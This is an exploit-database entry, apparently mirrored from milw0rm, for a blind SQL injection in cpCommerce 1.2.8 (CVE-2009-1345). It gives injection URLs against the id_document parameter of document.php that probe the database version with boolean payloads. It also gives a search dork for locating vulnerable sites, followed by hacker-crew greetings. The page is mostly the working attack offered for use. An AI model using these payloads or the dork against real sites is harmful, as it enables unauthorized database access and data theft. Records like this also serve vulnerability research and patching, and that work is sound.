[] NeoSense
E X P L O I T S
title author type platform port cve id

CPCommerce 1.2.8 - 'id_document' Blind SQL Injection

Author: NoGe
type: webapps
platform: php
port: 
date_added: 2009-04-15 
date_updated: 2016-11-21 
verified: 1 
codes: OSVDB-53919;CVE-2009-1345 
tags: 
aliases:  
screenshot_url:  
application_url: 
==========================================================================================


  [o] cpCommerce 1.2.8 Blind SQL Injection Vulnerability

       Software : cpCommerce version 1.2.8
       Vendor   : http://cpcommerce.cpradio.org/
       Download : http://cpcommerce.cpradio.org/downloads.php
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


==========================================================================================


  [o] Vulnerable file

       document.php



  [o] Exploit

       http://localhost/[path]/document.php?id_document=[SQL]
       http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=4
       http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=5



  [o] Dork

       "Powered by cpcommerce"


==========================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org ]
       OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
       H312Y yooogy mousekill }^-^{ loqsa zxvf
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
       Special for Vrs-hCk [ thx cuy.. :p ]


==========================================================================================

# milw0rm.com [2009-04-16]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.